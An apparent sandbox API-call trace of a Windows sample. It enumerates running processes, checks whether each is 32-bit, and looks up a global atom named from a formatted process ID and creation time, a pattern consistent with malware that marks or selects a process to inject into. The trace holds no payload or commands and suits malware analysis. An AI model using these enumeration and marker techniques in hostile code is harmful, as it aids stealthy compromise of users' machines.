	[0075.173] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.174] CloseHandle (hObject=0x224) returned 1
	[0075.174] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0075.174] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0075.174] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.174] CloseHandle (hObject=0x224) returned 1
	[0075.174] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x772170, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0075.174] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0075.174] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.174] CloseHandle (hObject=0x224) returned 1
	[0075.175] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x772188, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0075.175] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0075.175] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.175] CloseHandle (hObject=0x224) returned 1
	[0075.175] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x72eb08, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0075.175] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0075.175] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.175] CloseHandle (hObject=0x224) returned 1
	[0075.175] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x7721b8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0075.176] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0075.176] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.176] CloseHandle (hObject=0x224) returned 1
	[0075.176] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x7721a0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0075.176] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0075.176] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.176] CloseHandle (hObject=0x224) returned 1
	[0075.176] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x728958, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0075.177] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0075.177] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.177] CloseHandle (hObject=0x224) returned 1
	[0075.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x7721b8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0075.177] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0075.177] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.177] CloseHandle (hObject=0x224) returned 1
	[0075.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x7287f8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0075.178] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0075.178] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.178] CloseHandle (hObject=0x224) returned 1
	[0075.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x72ea18, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0075.178] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0075.178] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.178] CloseHandle (hObject=0x224) returned 1
	[0075.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x72e798, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0075.178] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0075.178] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.178] CloseHandle (hObject=0x224) returned 1
	[0075.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x772218, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0075.179] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0075.179] GetLastError () returned 0x5
	[0075.179] GetLastError () returned 0x5
	[0075.179] GetLastError () returned 0x5
	[0075.179] GetLastError () returned 0x5
	[0075.179] GetLastError () returned 0x5
	[0075.179] GetLastError () returned 0x5
	[0075.179] GetLastError () returned 0x5
	[0075.179] GetLastError () returned 0x5
	[0075.180] GetLastError () returned 0x5
	[0075.180] GetLastError () returned 0x5
	[0075.180] GetLastError () returned 0x5
	[0075.180] GetLastError () returned 0x5
	[0075.180] GetLastError () returned 0x5
	[0075.180] GetLastError () returned 0x5
	[0075.180] GetLastError () returned 0x5
	[0075.180] GetLastError () returned 0x5
	[0075.180] GetLastError () returned 0x5
	[0075.180] GetLastError () returned 0x5
	[0075.180] GetLastError () returned 0x5
	[0075.180] GetLastError () returned 0x5
	[0075.180] GetLastError () returned 0x5
	[0075.180] GetLastError () returned 0x5
	[0075.180] GetLastError () returned 0x5
	[0075.180] GetLastError () returned 0x5
	[0075.180] GetLastError () returned 0x5
	[0075.180] GetLastError () returned 0x5
	[0075.180] GetLastError () returned 0x5
	[0075.181] GetLastError () returned 0x5
	[0075.181] GetLastError () returned 0x5
	[0075.181] GetLastError () returned 0x5
	[0075.181] GetLastError () returned 0x5
	[0075.181] GetLastError () returned 0x5
	[0075.181] GetLastError () returned 0x5
	[0075.181] GetLastError () returned 0x5
	[0075.181] GetLastError () returned 0x5
	[0075.181] GetLastError () returned 0x5
	[0075.181] GetLastError () returned 0x5
	[0075.181] GetLastError () returned 0x5
	[0075.181] GetLastError () returned 0x5
	[0075.181] GetLastError () returned 0x5
	[0075.181] GetLastError () returned 0x5
	[0075.181] GetLastError () returned 0x5
	[0075.181] GetLastError () returned 0x5
	[0075.181] GetLastError () returned 0x5
	[0075.181] GetLastError () returned 0x5
	[0075.181] GetLastError () returned 0x5
	[0075.181] GetLastError () returned 0x5
	[0075.181] GetLastError () returned 0x5
	[0075.181] GetLastError () returned 0x5
	[0075.181] GetLastError () returned 0x5
	[0075.181] GetLastError () returned 0x5
	[0075.181] GetLastError () returned 0x5
	[0075.181] GetLastError () returned 0x5
	[0075.182] GetLastError () returned 0x5
	[0075.182] GetLastError () returned 0x5
	[0075.182] GetLastError () returned 0x5
	[0075.182] GetLastError () returned 0x5
	[0075.182] GetLastError () returned 0x5
	[0075.182] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0075.182] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0075.183] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0075.183] GetLastError () returned 0x5
	[0075.183] GetLastError () returned 0x5
	[0075.183] GetLastError () returned 0x5
	[0075.183] GetLastError () returned 0x5
	[0075.183] GetLastError () returned 0x5
	[0075.183] GetLastError () returned 0x5
	[0075.183] GetLastError () returned 0x5
	[0075.183] GetLastError () returned 0x5
	[0075.183] GetLastError () returned 0x5
	[0075.183] GetLastError () returned 0x5
	[0075.183] GetLastError () returned 0x5
	[0075.183] GetLastError () returned 0x5
	[0075.183] GetLastError () returned 0x5
	[0075.183] GetLastError () returned 0x5
	[0075.183] GetLastError () returned 0x5
	[0075.183] GetLastError () returned 0x5
	[0075.183] GetLastError () returned 0x5
	[0075.183] GetLastError () returned 0x5
	[0075.184] GetLastError () returned 0x5
	[0075.184] GetLastError () returned 0x5
	[0075.184] GetLastError () returned 0x5
	[0075.184] GetLastError () returned 0x5
	[0075.184] GetLastError () returned 0x5
	[0075.184] GetLastError () returned 0x5
	[0075.184] GetLastError () returned 0x5
	[0075.184] GetLastError () returned 0x5
	[0075.184] wsprintfA (in: param_1=0x770458, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0075.184] GetLastError () returned 0x5
	[0075.184] GetLastError () returned 0x5
	[0075.184] GetLastError () returned 0x5
	[0075.184] GetLastError () returned 0x5
	[0075.184] GetLastError () returned 0x5
	[0075.184] GetLastError () returned 0x5
	[0075.184] GetLastError () returned 0x5
	[0075.184] GetLastError () returned 0x5
	[0075.184] GetLastError () returned 0x5
	[0075.184] GetLastError () returned 0x5
	[0075.184] GetLastError () returned 0x5
	[0075.184] GetLastError () returned 0x5
	[0075.184] GetLastError () returned 0x5
	[0075.185] GetLastError () returned 0x5
	[0075.185] GetLastError () returned 0x5
	[0075.185] GetLastError () returned 0x5
	[0075.185] GetLastError () returned 0x5
	[0075.185] GetLastError () returned 0x5
	[0075.185] GetLastError () returned 0x5
	[0075.185] GetLastError () returned 0x5
	[0075.185] GetLastError () returned 0x5
	[0075.185] GetLastError () returned 0x5
	[0075.185] GetLastError () returned 0x5
	[0075.185] GetLastError () returned 0x5
	[0075.185] GetLastError () returned 0x5
	[0075.185] GetLastError () returned 0x5
	[0075.185] GetLastError () returned 0x5
	[0075.186] GetLastError () returned 0x5
	[0075.186] GetLastError () returned 0x5
	[0075.186] GetLastError () returned 0x5
	[0075.186] GetLastError () returned 0x5
	[0075.186] GetLastError () returned 0x5
	[0075.186] GetLastError () returned 0x5
	[0075.186] GetLastError () returned 0x5
	[0075.186] GetLastError () returned 0x5
	[0075.186] GetLastError () returned 0x5
	[0075.186] GetLastError () returned 0x5
	[0075.186] GetLastError () returned 0x5
	[0075.186] GetLastError () returned 0x5
	[0075.186] GetLastError () returned 0x5
	[0075.186] GetLastError () returned 0x5
	[0075.186] GetLastError () returned 0x5
	[0075.186] GetLastError () returned 0x5
	[0075.186] GetLastError () returned 0x5
	[0075.186] GetLastError () returned 0x5
	[0075.186] GetLastError () returned 0x5
	[0075.186] GetLastError () returned 0x5
	[0075.186] GetLastError () returned 0x5
	[0075.186] GetLastError () returned 0x5
	[0075.186] GetLastError () returned 0x5
	[0075.186] GetLastError () returned 0x5
	[0075.186] GetLastError () returned 0x5
	[0075.186] GetLastError () returned 0x5
	[0075.187] GetLastError () returned 0x5
	[0075.187] GetLastError () returned 0x5
	[0075.187] GetLastError () returned 0x5
	[0075.187] GetLastError () returned 0x5
	[0075.187] GetLastError () returned 0x5
	[0075.187] GetLastError () returned 0x5
	[0075.187] GetLastError () returned 0x5
	[0075.187] GetLastError () returned 0x5
	[0075.187] GetLastError () returned 0x5
	[0075.187] GetLastError () returned 0x5
	[0075.187] GetLastError () returned 0x5
	[0075.187] GetLastError () returned 0x5
	[0075.187] GetLastError () returned 0x5
	[0075.187] GetLastError () returned 0x5
	[0075.187] GetLastError () returned 0x5
	[0075.187] GetLastError () returned 0x5
	[0075.187] GetLastError () returned 0x5
	[0075.187] GetLastError () returned 0x5
	[0075.187] GetLastError () returned 0x5
	[0075.187] GetLastError () returned 0x5
	[0075.187] GetLastError () returned 0x5
	[0075.188] GetLastError () returned 0x5
	[0075.188] GetLastError () returned 0x5
	[0075.188] GetLastError () returned 0x5
	[0075.188] GetLastError () returned 0x5
	[0075.188] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0075.188] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0075.188] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0075.189] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0075.189] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0075.189] CloseHandle (hObject=0x224) returned 1
	[0075.189] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0075.189] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0075.189] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0075.189] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.189] CloseHandle (hObject=0x224) returned 1
	[0075.190] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LocationNotificationWindows.exe", cchWideChar=31, lpMultiByteStr=0x72e6d0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocationNotificationWindows.exe", lpUsedDefaultChar=0x0) returned 31
	[0075.190] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0075.190] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.190] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0075.190] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.190] CloseHandle (hObject=0x224) returned 1
	[0075.190] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x772188, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0075.283] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16cc8) returned 0xc0000004
	[0075.283] VirtualAlloc (lpAddress=0x0, dwSize=0x16dc8, flAllocationType=0x3000, flProtect=0x4) returned 0x2bb0000
	[0075.283] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2bb0000, Length=0x16dc8, ResultLength=0x0 | out: SystemInformation=0x2bb0000, ResultLength=0x0) returned 0x0
	[0075.284] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0075.285] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0075.285] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0075.285] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0075.285] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0075.285] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0075.285] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0075.285] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0075.285] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0075.285] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0075.285] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0075.285] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0075.285] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0075.285] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0075.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0075.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0075.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0075.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0075.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0075.286] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.286] CloseHandle (hObject=0x224) returned 1
	[0075.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0075.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0075.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0075.286] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.286] CloseHandle (hObject=0x224) returned 1
	[0075.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0075.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0075.286] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.286] CloseHandle (hObject=0x224) returned 1
	[0075.287] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0075.287] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.287] CloseHandle (hObject=0x224) returned 1
	[0075.287] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0075.287] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.287] CloseHandle (hObject=0x224) returned 1
	[0075.287] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0075.287] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.287] CloseHandle (hObject=0x224) returned 1
	[0075.287] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0075.287] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.287] CloseHandle (hObject=0x224) returned 1
	[0075.287] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0075.288] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.288] CloseHandle (hObject=0x224) returned 1
	[0075.288] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0075.288] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0075.288] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.288] CloseHandle (hObject=0x224) returned 1
	[0075.288] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0075.288] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.288] CloseHandle (hObject=0x224) returned 1
	[0075.288] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0075.288] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.288] CloseHandle (hObject=0x224) returned 1
	[0075.288] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0075.288] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0075.288] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.288] CloseHandle (hObject=0x224) returned 1
	[0075.288] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0075.288] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.289] CloseHandle (hObject=0x224) returned 1
	[0075.289] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0075.289] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.289] CloseHandle (hObject=0x224) returned 1
	[0075.289] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0075.289] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.289] CloseHandle (hObject=0x224) returned 1
	[0075.289] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0075.289] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.289] CloseHandle (hObject=0x224) returned 1
	[0075.289] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0075.289] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.289] CloseHandle (hObject=0x224) returned 1
	[0075.289] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0075.289] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.289] CloseHandle (hObject=0x224) returned 1
	[0075.289] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0075.289] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.289] CloseHandle (hObject=0x224) returned 1
	[0075.289] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0075.289] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.290] CloseHandle (hObject=0x224) returned 1
	[0075.290] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0075.290] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.290] CloseHandle (hObject=0x224) returned 1
	[0075.290] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0075.290] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.290] CloseHandle (hObject=0x224) returned 1
	[0075.290] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0075.290] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.290] CloseHandle (hObject=0x224) returned 1
	[0075.290] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0075.290] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.290] CloseHandle (hObject=0x224) returned 1
	[0075.290] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0075.290] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.290] CloseHandle (hObject=0x224) returned 1
	[0075.290] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0075.290] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.290] CloseHandle (hObject=0x224) returned 1
	[0075.291] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0075.291] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.291] CloseHandle (hObject=0x224) returned 1
	[0075.291] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0075.291] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.291] CloseHandle (hObject=0x224) returned 1
	[0075.291] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0075.291] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.291] CloseHandle (hObject=0x224) returned 1
	[0075.291] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0075.291] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.291] CloseHandle (hObject=0x224) returned 1
	[0075.291] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0075.291] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.291] CloseHandle (hObject=0x224) returned 1
	[0075.291] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0075.291] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0075.292] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
